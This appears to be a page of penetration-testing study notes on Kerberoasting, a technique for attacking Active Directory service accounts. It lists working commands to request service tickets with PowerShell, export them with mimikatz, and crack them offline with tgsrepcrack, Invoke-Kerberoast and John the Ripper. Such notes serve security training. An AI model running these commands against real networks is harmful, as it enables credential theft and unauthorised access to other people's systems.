x

Service Account Attacks

24.9.1 - Service Account Attacks

Service account attacks

  • If we know the serviceprincipalname value from prior AD enum, we can target the SPN by by requesting a service ticket for it from the Domain Controller and access resources from the service with our own ticket.

Request service ticket 

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '[service_principal_name]'

Export cached tickets 

mimikatz > kerberos::list /export

Crack SPN hashes 

python3 tgsrepcrack.py rockyou.txt [ticket.kirbi] #locally crack hashes

Invoke-Kerberoast.ps1 #Crack hashes on target

JohnTheRipper 

python3 kirbi2john.py -o johncrackfile ticket.kirbi  # convert ticket to john file

john --wordlist=rockyou.txt johncrackfile

Tags

Left-click: follow link, Right-click: select node, Scroll: zoom
x